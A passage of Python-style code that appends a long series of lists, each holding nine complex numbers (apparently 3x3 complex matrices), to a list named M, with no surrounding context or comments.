M.append([(33.4878006195-40.5941346218j),(-42.0757334065+12.3836632618j),(0.954361335923-33.0115295238j),(-37.9684894497+42.2762148561j),(81.8919882414+39.7767805966j),(-43.3919617038+19.3005774923j),(30.278513666-9.83654056393j),(-6.14468020169-30.8539061186j),(74.6202111391+6.81735402518j),]) M.append([(113.275152339+2.258195218j),(-1.73278827129-1.45161844239j),(2.82870976634-0.59763210433j),(0.828866309209+1.84819354219j),(116.266185896+4.18605980466j),(2.44032410167+1.75711505811j),(8.0240198475-0.242931175672j),(6.3126858143+3.52194190613j),(115.458661766-0.44425502266j),]) M.append([(87.78881022-0.637596631171j),(-2.40261236487+5.56615339765j),(-0.39721510792-0.935723805172j),(5.86728348587-37.9779404323j),(35.7483772774+1.35395339844j),(15.0755702929+6.27928354456j),(0.270177423843-42.8239957262j),(-60.3924755774+9.00591114505j),(109.462812503+5.28364323273j),]) M.append([(109.865286407-6.752240356j),(-11.8782264841-11.6140003751j),(-2.25948271528-13.8949635998j),(-7.47660572096-9.42617171341j),(72.3323995873+6.61595570132j),(-12.1068688682-15.884644772j),(-18.222021057+4.79781095335j),(-35.0415068711+53.4289598272j),(84.8023140053+6.13628465468j),]) M.append([(75.4735244851-4.14003537621j),(-6.40833308731+22.7377432551j),(-16.8611503984+8.6926807794j),(-23.7841707506-19.467072146j),(99.6998992423-4.23466573483j),(23.7068089578-13.8104701743j),(-11.5254829292-5.68461697948j),(3.7041299337+17.425101384j),(86.8265762726+14.374701111j),]) M.append([(110.274403488+1.20313443606j),(-18.6648393735+7.19916468024j),(0.326755909225-10.0655436529j),(3.26771191685+13.9227485097j),(73.6414683673+12.9923260166j),(23.8303356727-9.77029991708j),(2.0472259203-27.8789503161j),(37.0789188077+22.4628593197j),(60.084128145-8.19546045263j),]) M.append([(123.742092036+24.1999383237j),(-0.771470197939-10.4347005866j),(-13.8594291048+6.20220518654j),(-32.9265309331+32.829267225j),(138.531262264-15.2541422792j),(-28.2526441676-17.3231334687j),(-25.0458428746+75.0468560125j),(15.9716503934-38.6572477224j),(64.7266457005-2.94579604454j),]) M.append([(78.4472438141+0.764601315765j),(14.082657511-13.1394446629j),(-14.9124408978+7.55224381589j),(11.6435566286+17.1628146288j),(65.9986857192+5.38045431584j),(2.53872702984-6.99277534209j),(-3.08953692739+5.13549206452j),(4.01543242478+3.30512898368j),(49.5540704667-0.145055631603j),]) M.append([(115.593667469+1.16894822877j),(3.55446685317-0.329053348205j),(-2.01951971097+5.21753934023j),(0.51657657081-0.182613121604j),(113.153364508+3.16432970517j),(-0.69729238552-4.67278977588j),(-5.12603788759-3.93258888589j),(-6.91914084485-1.93863304657j),(116.252968023+1.66672206606j),]) M.append([(67.3335204865-16.2770999756j),(-25.0836147632+26.7021955611j),(-8.58790506386-36.2085544412j),(2.46314805683+6.52875965339j),(99.1908097915-0.770506488046j),(-2.78329339914+7.95689861937j),(-6.00516709895+27.2700987458j),(28.8603958053+9.9243176473j),(67.4756697221+23.0476064636j),]) M.append([(52.8439587375-20.5484117j),(16.6110640841-62.8752779481j),(-18.8397250639+77.8437509211j),(2.98683253325+44.6763898171j),(65.1090097806+11.2756531918j),(53.6849578785-12.755605426j),(-15.3510061283+25.2798075738j),(-32.1085384565-11.3493669429j),(149.047031482+15.2727585082j),]) M.append([(-18.6040364347-9.39870904246j),(-13.3242454279-86.4008585246j),(97.3927458827-3.25190289819j),(-57.5195836043-28.0820740804j),(103.493879271-33.5606956152j),(57.2103994188+14.3597154933j),(-88.8717932017-70.4637583002j),(46.8000392088-76.210407191j),(177.110157164+48.9594046577j),]) M.append([(98.2237283496+22.4074786839j),(19.2530546251-18.292206937j),(0.794989192323-6.90602524193j),(50.0956186611+9.54996862095j),(59.9197442722-23.9770673426j),(-1.56149226066-22.6512046747j),(-14.8187377272-14.9233925777j),(10.6362417115+17.4208669709j),(85.8565273782+7.56958865879j),]) M.append([(100.656610558+6.91344232054j),(0.478409884243-10.6535563492j),(-2.19667508109+19.7930063494j),(-9.35696823493+17.7669967712j),(109.647797747-8.45051762604j),(12.6036717899+16.2047414355j),(-6.31222021345-1.95582081083j),(0.493333904066-1.22061396758j),(116.695591695+7.53707530549j),]) M.append([(65.2772763655-8.54892003441j),(-17.9508046767+13.8705785533j),(-29.5786079917+0.059408163618j),(-8.56027203915+10.1202675795j),(70.3936537522-6.58160019797j),(23.9710525914+8.69755693397j),(-19.2858798338-7.0243417426j),(15.7630566947+7.46314109961j),(55.3290698822+21.1305202324j),]) M.append([(114.530551213+2.65593829524j),(-4.56608097158-1.15073812367j),(1.64473322615+0.603916016078j),(-7.62334608217-1.39937499834j),(114.353014371+2.63207608735j),(1.44991103025-0.327958625983j),(-4.74413273863-1.86606234962j),(1.89674722128+3.13744061397j),(116.116434416+0.711985617417j),]) M.append([(173.725630749-14.5667972039j),(-87.5231461792-7.17522754669j),(5.07423203568-90.5788040954j),(61.5759117479-18.6854772163j),(25.7090695765+2.5841196842j),(-2.91053471044-71.2775859188j),(-26.3584358124-47.0905675502j),(12.1989985899+54.9824917599j),(34.5652996747+17.9826775197j),]) M.append([(125.112510622+16.504544288j),(7.14105064772-14.2019791677j),(14.6235394515-15.0869635812j),(42.0708758905-46.7069184227j),(65.3775999411-16.0938145477j),(-64.6491304701-32.7442173355j),(10.9074705826-33.3543058535j),(-24.8815548311+0.986350469161j),(76.5098894365+5.58927025975j),]) M.append([(106.212625766-2.39745987741j),(20.4960391187+18.5829046214j),(58.7867252622+7.79403599421j),(7.47167454152+15.2035164022j),(85.6119193632+11.4475624149j),(-1.50147596045+34.5939749558j),(7.62304755229-3.73651946809j),(-10.541933252-16.0899565089j),(71.1754548707-3.05010253746j),]) M.append([(85.3235489097-25.9182415886j),(-5.88997409491+17.9666932959j),(-33.2995327453+33.3868849048j),(-45.5824378713-41.3493474475j),(98.368524833+30.8761139933j),(-16.0646891364+87.1439783006j),(11.4090774878-25.3419433618j),(-11.8413941092+0.131538759171j),(60.3079262573+1.04212759526j),]) M.append([(115.117396739+4.91449873072j),(-5.7871070672-3.64719598136j),(-11.3714973133+6.3298771458j),(-5.88977575743+7.11205393094j),(107.869881099+4.63418016764j),(-7.21730274713+6.50226924818j),(-8.60376787031+0.190982886092j),(-5.56444839768-6.23032423865j),(104.012722162-3.54867889836j),]) M.append([(181.47029095+85.0802436092j),(141.131168658-27.9064856515j),(-128.18365792-59.4862263596j),(-69.6759583361-36.8064679459j),(9.39343132513+43.2405773645j),(90.3331077986+15.1497858992j),(2.99842542371+113.785883028j),(110.778196214+76.3183476227j),(48.1362777251-122.320820974j),]) M.append([(61.2420389795+38.7368693281j),(-34.837223217-52.2321956701j),(17.4376324887-60.3815429961j),(-17.3642356689-4.47833808038j),(30.5024469717+14.4555350566j),(7.83694565597+5.83851125651j),(20.8986526906+53.7230102781j),(6.54764330575-56.5768092789j),(62.2555140488-47.1924043847j),]) M.append([(122.832945828+17.9627713009j),(20.6670715014+12.1734807163j),(17.0362400489+8.28407851507j),(9.1887899206-8.37060397604j),(117.878306042-17.243277376j),(-2.08876323191-13.7714488318j),(-13.0395406362-13.8819263119j),(-29.6313433307-2.06872992298j),(96.2887481303+5.28050607512j),]) M.append([(107.079434585+7.92844861435j),(13.0178717783+26.0011338017j),(-17.3199687908+23.9090206608j),(-0.754159253364-1.74729254181j),(102.890134286+4.12409533369j),(-4.04418670939-6.20495553497j),(0.592504411897-2.58163530429j),(-5.22127541345-8.16021259777j),(115.030431128-6.05254394804j),]) M.append([(115.185121769-0.968376175569j),(0.936322309749-1.20943787003j),(2.3061703998+0.586121105168j),(-1.50357383406+1.30386146708j),(114.639567056+1.87665992456j),(-0.301035767725-1.4595504921j),(4.031794112-1.30581297385j),(2.40697154922-0.282800988194j),(115.175311175+5.09171625101j),]) M.append([(41.1029333293+2.2068691904j),(-6.56580800964+1.8313472349j),(3.99342643081+3.04039969821j),(-7.65228091957-3.96934918843j),(38.9161244059+3.95932386445j),(-6.88332923966+5.12547347816j),(5.7234959308+7.60815563274j),(-4.39599485522+0.792505836788j),(57.9809422648-0.166193054849j),]) M.append([(65.8391115703-2.1500190968j),(18.9278024985+58.6409363915j),(-48.5657337439+33.5311810559j),(32.8090352451+7.62195896312j),(10.0653878157+37.6050530024j),(-33.2004046437+11.3249478221j),(-54.2361263579+2.47020063558j),(-17.1089368799-55.6754536875j),(56.095500614-29.4550339056j),]) M.append([(118.640425531+3.73538475867j),(-2.98179890143+0.196515460925j),(0.614757331232-0.463205649979j),(8.28530921575+4.38266108161j),(100.288340781-0.00546690466622j),(1.33952542115-1.75263798444j),(-2.02392553677-4.02449255861j),(7.11964195072+4.19122058139j),(115.071233688+2.270082146j),]) M.append([(85.8465364728-21.4042901113j),(27.1254488607+22.3591229699j),(11.1854698473-0.58623899386j),(37.4668250298-28.9957575971j),(74.3244123102+29.0979004614j),(0.0219229565666+14.884160847j),(5.25114495367+25.7065096043j),(-2.04243454288-28.1745703171j),(103.829051217-1.69361035018j),]) M.append([(99.6464722851-14.6008851514j),(-22.2771743257+6.12646198176j),(-37.0708019705+30.0225408868j),(11.2337367696-22.209137609j),(61.9664121043+4.63878041703j),(-60.9470658695+37.3729464657j),(4.65626863594-4.67360899657j),(-13.0011227689-1.15205762627j),(70.3871156105+15.9621047344j),]) M.append([(69.6451229579-11.3272528547j),(-10.9754928727-30.2769863451j),(50.212180972-2.58301432254j),(27.8852168123+7.24035974153j),(112.55928276+25.6542622863j),(-40.9034344433+10.447940803j),(18.9221938337+18.7722287527j),(0.662816476091+26.9669885508j),(58.7955942821-8.32700943166j),]) M.append([(83.9129407255+2.49278017524j),(21.899022198-23.8251056712j),(29.5701748242+25.4124634176j),(2.13853360715+4.73301600829j),(75.6335494461-4.56969156247j),(6.42530535676-18.8567226412j),(2.94086144665-5.19777006439j),(3.92907131126+23.510567838j),(66.4535098284+8.07691138723j),]) M.append([(103.716682941+21.1762386048j),(-9.20175042965-6.95163323794j),(-9.96947480425+3.24697730871j),(13.7863930839-35.1100613037j),(127.69036757+16.418873349j),(19.5189308612-5.91115055564j),(-82.4790004662+5.54250841117j),(13.2389682691-48.5904243932j),(80.5929494884-31.5951119538j),]) M.append([(25.8967572248+2.68765313404j),(-2.72488595602+16.4219700925j),(-6.28367565914-0.518312585347j),(21.6251280615-1.3478808402j),(118.566699331-35.4498524198j),(-22.7194263327-23.9139808222j),(-17.3057980685-28.2747367786j),(-79.6309521794-88.9124874751j),(0.536543444096+38.7621992858j),]) M.append([(118.257960149+6.08415587142j),(7.91757128805-20.1632140531j),(0.0207451134157+2.25409084026j),(3.89000764565+0.343702252103j),(102.504085626-0.276326920363j),(2.08399369153+0.517882303722j),(0.0463199106083-3.75248000666j),(-1.58325842099+8.63455288145j),(116.237954226+0.192171048941j),]) M.append([(110.576456133+1.10304957873j),(2.19333317114+1.10302844366j),(0.552108898971-1.39154797232j),(0.42742008794-2.21539726122j),(112.663095832+1.6127362599j),(0.781628446451+0.389349076513j),(2.04697963117-3.04004528285j),(2.29853546077+4.05607757891j),(115.760448035+3.28421416136j),]) M.append([(98.4865747959+9.6345504153j),(15.7322075027+29.7844444479j),(-17.1027425213-15.0511900679j),(-4.72529399561-15.0678652933j),(86.0398061869+10.0296524317j),(17.0063221874-11.8542015289j),(-20.0461542948+15.5173202875j),(30.4810358978+33.6867599264j),(88.4736190171-13.664202847j),]) M.append([(54.7403876712-8.27009931446j),(-0.16608311444+32.3676049627j),(-25.2370423805+28.537747341j),(19.578513557-10.8428671784j),(39.7153875859+15.3906089591j),(-21.883925643-6.42329376993j),(-25.6269267475-7.4426860356j),(36.9436880572-24.1464147736j),(100.544224743-1.12050964461j),]) M.append([(87.9530985496+7.66054631363j),(4.32287930106+5.59208723184j),(11.7994540803-5.00939726244j),(24.8454841434-18.1002513918j),(91.5738294924-9.48161447945j),(-21.6226682241+17.4616136312j),(51.63717413-5.44513134033j),(-5.04015289993-23.6731779024j),(55.473071958+7.82106816583j),]) M.append([(101.148110324+2.76873282925j),(2.00252277837+0.223522850481j),(1.21569868749-1.53469721548j),(-0.775723794885-1.28834341482j),(105.790269239+1.22434344774j),(1.99200994498-1.68552173054j),(-2.10952958467+1.04472381855j),(-1.0163777128+1.06778575392j),(102.061620437+2.00692372301j),]) M.append([(110.073727099-4.15092826007j),(2.17837214914+2.684844274j),(6.13443853405+3.80210948796j),(-1.51115823754+0.0462481458896j),(109.070655234+4.1851055205j),(-4.29805794491-2.26625897486j),(9.54502788576-3.23107746563j),(-6.69545033424+1.77539237542j),(109.855617667+5.96582273957j),]) M.append([(103.719807121+0.549455900864j),(6.51514988254-1.31383817072j),(1.23856658522-3.99863338988j),(6.10935448904+5.17289910406j),(109.64155566+5.25499489755j),(2.79382429162+4.00910073536j),(4.3259134546+2.85809622359j),(3.57500907896-5.95948582729j),(108.638637219+0.195549201584j),]) M.append([(62.8821007474+54.0382257244j),(-23.6925679548+22.3992536572j),(-0.0181013884141-53.899020546j),(-45.0224297451-41.2282244209j),(70.3053631519-18.1779243441j),(49.9771940454+14.6607260443j),(-29.4620825058+11.515628925j),(1.94247420033+8.27591582807j),(122.812536101-29.8603013804j),]) M.append([(116.997633707+1.47587291128j),(-0.525709601642+2.25108919756j),(3.42328730954-0.127133749148j),(-6.46587256411-6.60122716619j),(111.532636191+5.93791885504j),(2.26939377772+3.48455481874j),(1.06946134695+7.48084536281j),(4.83408272652-0.226603893295j),(116.469730102-1.41379176632j),]) M.append([(65.4625303429+5.01969127895j),(-3.02828620326-14.7529671792j),(14.4495097297+3.50506817565j),(-5.63734341096-3.46352490363j),(55.6784012485+17.4327163579j),(-23.9124692003-5.30436196959j),(13.1411094953-11.0061377653j),(-31.3755789968-5.68789845996j),(69.8590684086-16.4524076368j),]) M.append([(-4.02373247052-953.63620655j),(821.129329363-1007.48195236j),(975.565971706+876.560951318j),(-71.0913317348+529.687095786j),(-523.443219629+482.780287804j),(-461.417648417-573.779567786j),(-89.8818965606-593.452831227j),(418.536489198-683.631269758j),(681.4669521+476.855918745j),]) M.append([(108.926500946-2.30778987503j),(5.64353816466-7.96377074083j),(-0.337282419889-8.85352075517j),(3.44643704531+0.0590526911026j),(116.755550005+4.5312933891j),(1.43268422306+1.51589173607j),(-2.84315744617+8.80780394993j),(-1.96196782116-0.82345857862j),(111.317949049+3.77649648593j),]) M.append([(110.180677176-8.05246775572j),(-5.30354563561-6.57332989013j),(11.7914404033-4.35937959618j),(-5.19655500193+12.2825209425j),(111.671737036+14.4065111737j),(-7.65518254124-3.3097038049j),(5.25229223541+7.80717648319j),(8.71318208021+4.62378027302j),(103.147585788-0.354043417976j),]) M.append([(115.494784376+1.23703945847j),(1.27521077784+0.646306577909j),(0.323257881728+0.179384647138j),(0.0922334955735+0.180008495348j),(114.034629998+3.20471866212j),(0.0413507843939+1.36222960482j),(0.417557724799-0.634079995877j),(0.435874323515-0.108042692439j),(115.470585627+1.55824187941j),]) M.append([(75.0244376633+9.59849084675j),(-36.3446471348+17.4952826267j),(30.3982307226-11.4105383359j),(12.6737024834+18.0561370571j),(12.693353537-6.84007505442j),(20.8518570782+8.0602122823j),(5.74745771413+5.70728879499j),(-11.26512137-5.36588195267j),(50.2822087997+3.24158420767j),]) M.append([(27.3452457088+2.95615448417j),(14.0675344368+42.8189962106j),(8.88807508195+6.63962517342j),(10.6142922749-18.3861507475j),(59.1926150109+6.6740748815j),(10.6034370995-6.10396200647j),(-24.4501916072+3.77988068957j),(-29.3468842326-48.3776638406j),(-3.53786071973-3.63022936567j),]) M.append([(58.5003554711+1.88113247231j),(-4.91060341851-2.49129837523j),(11.2299629819+4.99265864968j),(10.4925854377+3.03684285061j),(71.9153273993+7.2890882503j),(-13.7731616015-11.8969251694j),(3.25919798892+0.469867117074j),(1.06138995599+1.27321899894j),(63.5843171297-3.17022072261j),]) M.append([(112.147688303+2.44978251869j),(1.925108384-6.39302862745j),(-0.321541806158+1.54573707588j),(-3.49281932211+7.13857219445j),(105.310431195+4.42195013851j),(-1.23752726058-0.0157311791916j),(-14.7537392534+0.399789560759j),(-3.92855831108+9.07122262174j),(102.541880503-0.871732657206j),]) M.append([(64.9733035608+2.03182558053j),(0.275640034777-0.625811789416j),(1.48217143227-0.517995491854j),(0.367175581361+0.367084345754j),(66.7148651344+2.81492233255j),(-0.0101857994459-0.240985106228j),(-0.653119557726+0.821718903054j),(-1.19930408533+0.245230890179j),(66.3118313048+1.15325208692j),]) M.append([(52.1544568651+40.7728393086j),(-29.3112612409+38.1280333563j),(23.1559618375+37.4984135824j),(-33.1741060902-11.2858865358j),(87.9172652417+0.461633457849j),(-8.26578089233+21.7752020441j),(60.6106299416+19.4739971239j),(45.0937312002-8.36028801945j),(124.928277893-35.2344727665j),]) M.append([(58.302234858-12.0992134894j),(-20.5336637569-7.41830521872j),(8.4654185671-2.48076345105j),(-0.624598991489+49.8473077353j),(101.779232756+16.4713984753j),(21.6667732858-4.4911441034j),(31.8754493427+34.6142350811j),(22.4820832398+12.0759482219j),(92.9185323864+1.62781501411j),]) M.append([(113.185743615-87.3124266192j),(-29.1247931901+47.4088728256j),(119.42630503-6.00747559132j),(4.13374300334-145.239084466j),(43.6433929289+66.001366547j),(116.325494669-89.1648927165j),(2.04393515879+36.7208479621j),(-2.16130282285-14.6540356865j),(-2.82913654429+27.3110600722j),]) M.append([(100.145844935+0.492338520512j),(10.2828424364+1.67570157781j),(5.99124959306+0.0868569121129j),(-5.45238645388+5.13292872963j),(121.47128895-0.346208709556j),(2.48155468079-0.877215588588j),(11.411734556-7.72833715478j),(-6.16665543276+1.03549543272j),(115.382866115+5.85387018904j),]) M.append([(104.846668165+2.90435119258j),(1.79401741592-1.08140219786j),(2.80002951241-6.96837711116j),(-1.14027014363-0.0140002869658j),(112.033644642+3.34944143602j),(5.03260547113+0.0533094278127j),(-0.214102250299+4.76900664613j),(0.7100708304-1.87036907167j),(108.119687193-0.253792628592j),]) M.append([(114.142863869+1.66349871965j),(-0.374024539624+0.158548144968j),(-0.945924515326-0.555375949611j),(-1.85107718289+1.50507353488j),(116.018764165+1.91389903086j),(-0.728390635464-0.843704026942j),(1.62358997057-0.11703826015j),(-0.582697992782-0.0321004339368j),(114.838371967+2.42260224949j),]) M.append([(56.8184747215+1.22897494627j),(7.7295479057+1.46274303497j),(9.13243684267+5.54234462356j),(11.3448654391-6.79313119361j),(47.8192744999-2.19835116118j),(7.7509400519-1.1703276346j),(3.97489829737+3.3710636336j),(-6.78657497491+5.79741428361j),(33.3622507787+6.96937621491j),]) M.append([(100.342404315-41.5918865567j),(11.2316393281+37.087375883j),(-52.3722541643-12.1147827969j),(187.18223203-44.3079933715j),(15.3194114462+75.0521429403j),(-92.2087308733-42.8020318515j),(73.3801338858+11.7832485468j),(-8.82895387858+27.2269948461j),(-17.6618157611-27.4602563835j),]) M.append([(116.974471644-0.993664817168j),(-21.408888218+9.02676598978j),(-14.2553216086-36.5527481066j),(29.592078322+25.5731892264j),(59.0676758953-4.33457664764j),(27.5625094446-40.2472628164j),(-17.0165851775-22.7895630539j),(21.1562726514+10.451694511j),(68.9578524605+11.3282414648j),]) M.append([(94.9381351392+7.2143453539j),(-15.4867723264+3.73864188348j),(-2.54171649468+15.069178819j),(-7.96010354196+12.3987170884j),(85.9200533848-1.8684811284j),(-10.0871005706+12.651804683j),(12.5520427029-16.170938359j),(5.25890230799+10.147459658j),(116.141811476+0.654135774495j),]) M.append([(61.2157980361-6.4647290567j),(5.06087103552+5.6329959113j),(-22.0363052437-5.23444016191j),(28.6225619686-2.67220149629j),(72.3258965556+10.8670835569j),(-14.1236873539+12.6068082106j),(-8.46588424314+12.3152612644j),(-1.0116559204+1.83538839042j),(52.4583054084+1.59764549983j),]) M.append([(79.0600958754-6.58489968457j),(4.69771790773-8.25243471834j),(8.210502979+15.2447819665j),(2.412746165-4.02520947369j),(67.6042630337-0.30141291766j),(6.00830286432+4.70715902569j),(10.2052098081-8.68717144947j),(4.50102759847-8.19008697841j),(77.3356410909+12.8863126022j),]) M.append([(78.7908055901-12.4047077289j),(-33.1723137015+11.37167316j),(57.137949406+13.4204515475j),(3.06275336934+13.3170275136j),(44.9312987413-9.05624571385j),(-9.5438374485+16.9289857444j),(18.4173828555+7.56871121864j),(-15.3592538906-5.74723722929j),(61.2778956685+27.4609534428j),]) M.append([(64.8850709869+4.79171033008j),(3.35015571001-1.22773876034j),(-3.6577527411-1.28691673397j),(2.11642048804-0.997538699155j),(63.8094132732+0.795656242356j),(1.5113538751+2.75923633563j),(-1.25272733547-2.54068544862j),(-0.725029313454+3.14744176605j),(69.30551574+0.412633427568j),]) M.append([(23.9990281331+14.422957055j),(-35.9285147554+0.323538345285j),(-25.7439770163+28.1505879589j),(36.5016717337-41.6671170456j),(115.22739244-15.2156705835j),(1.52183334244-30.2057073226j),(-1.44876606472+6.83701700152j),(1.83174964588+0.936784949062j),(93.7735794266+6.79271352853j),]) M.append([(50.7077523522-7.30238880981j),(-0.480055735688-14.1181498717j),(-3.82540854517+10.6369812068j),(4.99000869999+14.5181236331j),(58.5327215909+11.9427798562j),(8.58613982273-5.11089844393j),(0.351684719373+2.50774046401j),(-0.608513795638+3.9596943843j),(65.7595260569+1.35960895361j),]) M.append([(53.1746478587+14.1487545476j),(-1.95577852885+23.0739438789j),(8.30683799532+35.3294258384j),(-8.16030280642+19.8386385515j),(77.6964711279+27.4284443178j),(21.7530244646+38.8773998328j),(19.0446260803-9.42806554593j),(11.9285780826-26.2767540416j),(77.1288810134-35.5771988655j),]) M.append([(67.5575358955+36.7081193461j),(8.93147697297-39.600467715j),(-17.308059871-33.0781121061j),(29.3120592128+30.5775256517j),(55.5471899856-13.7926957088j),(-35.8309443523+11.6996687775j),(-25.0063526364-1.77231232236j),(20.9112457296-7.33802781857j),(102.895274119-16.9154236373j),]) M.append([(44.2894341595+14.0938274677j),(-19.2766751541+8.68760040152j),(0.358250491756-0.659774374135j),(-57.5162971057-23.8456566059j),(49.7345794569-42.6637630918j),(44.1137167127+26.7167032818j),(-46.4086309217-48.2734223072j),(46.2384849068-35.7340286424j),(59.9759863836+34.5699356241j),]) M.append([(119.914035974+8.92823352907j),(8.02852368276+0.250874477427j),(-10.0668720396-11.973116407j),(-2.69935710011-1.9714577969j),(112.07934598+2.3660892813j),(9.16727932494+2.58075887409j),(4.07442082245+5.70796739163j),(9.82676777652+0.711023038775j),(105.006618046-5.29432281037j),]) M.append([(115.036212307+9.77380444428j),(3.28870590902-5.5411921107j),(6.90816660216-1.55738277717j),(6.89319444764-11.579638314j),(100.157076332+0.997280881452j),(-5.99330387423-6.58266986977j),(14.1413610432-8.03406355446j),(-9.06363988031-8.81162744768j),(109.806711361-4.77108532573j),]) M.append([(115.511109314+1.77227744758j),(0.355445933983-0.724675183993j),(0.184632292415+0.291073469445j),(-0.17687274343+0.776169429734j),(115.646401658+1.45870614355j),(-0.659271720932-0.38524943466j),(0.392858228641-0.0927744360521j),(1.3852583827-0.589766380828j),(113.842489028+2.76901640886j),]) M.append([(78.102959479+0.866267813193j),(4.32832788702-41.1161486819j),(-13.4531520642+6.57017981925j),(11.5577247938-29.174566159j),(12.5404923493-20.484778407j),(-4.05967600076+16.1852881737j),(6.04655951762-52.8883318217j),(-60.4001368272-17.4558220478j),(47.3565481717+25.6185105938j),]) M.append([(57.3524937303+9.38349365379j),(62.9532726664-20.808994567j),(-27.5592256069+32.7167026543j),(8.92743152788+8.49827891836j),(25.7241156111+6.25022728414j),(-10.9919458996+2.61176505199j),(-17.8254801955-4.56437423409j),(-23.3190874147+5.08838446262j),(19.9233906586-9.63372093793j),]) M.append([(98.4119041617+25.6702940286j),(53.6874289843-26.0449233741j),(8.77585765059+30.3699299318j),(6.36312303097+3.06122985536j),(99.4001399731-21.1925220925j),(13.1146578614-2.49404251009j),(-21.5443976447-9.65654811921j),(7.24574531885+61.4958308411j),(67.1879558652+1.52222806393j),]) M.append([(52.2489562089+1.83485175742j),(-8.99359673222-36.0492545773j),(-14.7442119876+15.5043648575j),(-8.04260723995+18.4035161825j),(75.8720299643-1.92479680908j),(-5.49643138246+1.2948161766j),(3.44555433946+17.3189725386j),(-27.7961824025+21.422920943j),(112.879013827+6.08994505166j),]) M.append([(85.6101790273+1.81723573977j),(-1.48653205081+1.96507498814j),(-0.0713055864302+2.33920407196j),(2.55901298587-9.29639583715j),(84.3056211184+4.93805644173j),(3.76711136466+0.330937923462j),(-4.10276206603-5.81639861497j),(3.21073606312-1.4893053661j),(82.0841998543-0.755292181496j),]) M.append([(57.0629767558-1.72809834338j),(-2.98155479701-1.03688571722j),(10.3218648871+5.93237987228j),(-19.5478153345-22.3803738136j),(47.2731719617+17.1516230855j),(-6.98957697575-27.582127172j),(22.7012263844-27.0615665482j),(-17.8078052595+2.80191052217j),(80.6638512824-9.42352474208j),]) M.append([(75.7279821403-4.32504753559j),(4.43070218779+10.4127986969j),(2.84065574235+7.91145164398j),(-4.74473314257+2.97695444359j),(89.3112995387-2.53737408147j),(6.84035592761-1.73639011556j),(-8.69318736916-7.65877784199j),(9.4870523386+13.7183994772j),(86.9607183209+12.8624216171j),]) M.append([(71.0054293043+6.54271291328j),(-42.1052449888+21.884062869j),(37.5297345647+4.27164350943j),(-26.9245590625+8.57895191055j),(67.8414636-33.424739737j),(-33.4635091479+14.3528220387j),(-5.53996108002+21.8771168296j),(-16.8573315238-32.9965908224j),(44.1531070958+32.8820268237j),]) M.append([(77.5058169528+12.1361176021j),(16.5244005965+12.623495586j),(-28.3951042448-5.08356049013j),(-0.98152018081-23.1626887356j),(73.7943645514+13.2809268962j),(24.5926279608-21.1987137192j),(-21.1575957001-9.29523327654j),(21.4845709799+25.0901559909j),(84.6998184957-19.4170444984j),]) M.append([(118.066630143-53.201707767j),(39.3013759992+19.2791361753j),(10.523709775-44.9153758142j),(-6.61228087331+84.8624475118j),(35.9528116829-13.2864693201j),(-12.2356925716+66.9081320871j),(-37.5056875209+100.254686817j),(-70.4307965021-42.1618809204j),(76.980558174+72.4881770871j),]) M.append([(117.433504968+3.58852328773j),(-2.48540596923+2.56665910431j),(-0.20580038769+1.51430057441j),(1.04717904471+9.49644109679j),(102.461561659+2.63518963085j),(2.70587904348-7.42261235306j),(3.12863027985-0.684851104674j),(0.58004977071+5.09213886118j),(111.104933373-0.22371291858j),]) M.append([(114.822404795+0.994353673714j),(0.127018178514+2.65163362282j),(-0.395335543498-0.0804697280056j),(2.88212442873-1.7391011217j),(110.589402575+2.00621211957j),(0.532048449926+0.608196296648j),(2.5717443323-1.19866609802j),(-2.89218471106-1.25629712912j),(115.588192629+2.99943420672j),]) M.append([(58.4275979085+17.908817941j),(35.1344101509-3.10837467319j),(42.4387394396-6.69969089995j),(13.4240127676+11.8459435028j),(76.4203138398-14.3926481251j),(10.6092827789-15.1460822147j),(19.2999770896+11.5888703234j),(24.1247700865-13.3472722877j),(83.1520882517+2.48383018413j),]) M.append([(10.8102334403-2.58477206355j),(-1.0753179473+3.39662591319j),(-15.963971206+5.88035972369j),(-3.60682386889-0.548334113893j),(11.2266907205+3.43815667479j),(6.24712160258+10.2167212227j),(-4.81644189393+3.98592352952j),(3.22305998425-2.42986906203j),(29.9630758393+5.14661538875j),]) M.append([(86.8036047546+4.73628021243j),(-5.17519692225+15.9944236106j),(1.47925351542-2.55661178414j),(-1.5979077077-11.0566365045j),(78.8901587693-5.19631699543j),(-8.21862032929-8.9360659294j),(3.45571590458+9.50872819178j),(-12.5457755417+14.9918563098j),(74.3062364761+6.460036783j),]) M.append([(62.1692265195+3.65552128798j),(45.755391446+85.3428832431j),(34.4199028272+118.986222699j),(-2.03118385499-14.7195705691j),(78.0283970706+24.8177164134j),(-37.694048851+21.3821726614j),(2.33563472624+15.3098752904j),(37.3103244586-28.5300949162j),(152.80237641-22.4732377014j),]) M.append([(100.691410862-1.94045169095j),(-2.22036267673+5.13551999996j),(9.37115899842-1.50048654031j),(-2.02335750283-0.181175070264j),(98.9655394482+3.24608047559j),(-0.386043665474-3.68585026265j),(3.57769998636-0.863745954725j),(-4.78839016481+2.29578980152j),(104.34304969+4.69437121536j),]) M.append([(73.5371878695+10.0504460672j),(-15.0870684226-6.96846798101j),(-6.71418464508-36.1160961418j),(0.835384437031-8.42751459536j),(101.509751766-0.844386488892j),(9.41362054195+1.61699438085j),(2.20938468255+28.1142450418j),(-13.6702153795+13.6605494218j),(61.9530603648-3.20605957834j),]) M.append([(66.0322492438+2.50832503217j),(0.247716573161+0.938948852023j),(-2.77631016826+2.30978253395j),(-0.524407270555+0.0612270497119j),(66.4855653716+2.64984775375j),(-1.33457683538+0.537326323648j),(0.604020332855-0.437176470899j),(-1.31614634626+0.266844005753j),(65.4821853846+0.841827214082j),]) M.append([(27.1945510412-7.31791859738j),(-23.5499271583-50.1935980423j),(-62.1336880691+15.9729391156j),(-14.138857629+8.52622781592j),(79.8771165006-3.93057908813j),(-10.5816856885+13.4068280711j),(25.39640954+27.1452060987j),(-6.96315094968+29.3349365941j),(124.928332458+17.2484976855j),]) M.append([(57.40824085-3.96200957974j),(18.4456142476-13.6974667348j),(-18.0483281725+2.46508509058j),(5.0435892733+11.9970790754j),(68.8989109285-1.22327090731j),(7.41096086906+6.18814648152j),(-6.97204403945+9.07069507938j),(-3.44400158348-9.64343143159j),(78.6928482215+11.185280487j),]) M.append([(77.375076531+12.7958019436j),(-9.59586137834-11.3074559501j),(9.40325162558-10.2903747187j),(-13.8670640743+24.0473813661j),(72.7937003466-8.16156072194j),(8.14151049916-20.8455914906j),(12.8545384667+1.25168017084j),(-3.16642095287+10.6526544291j),(81.8312231224+1.36575877833j),]) 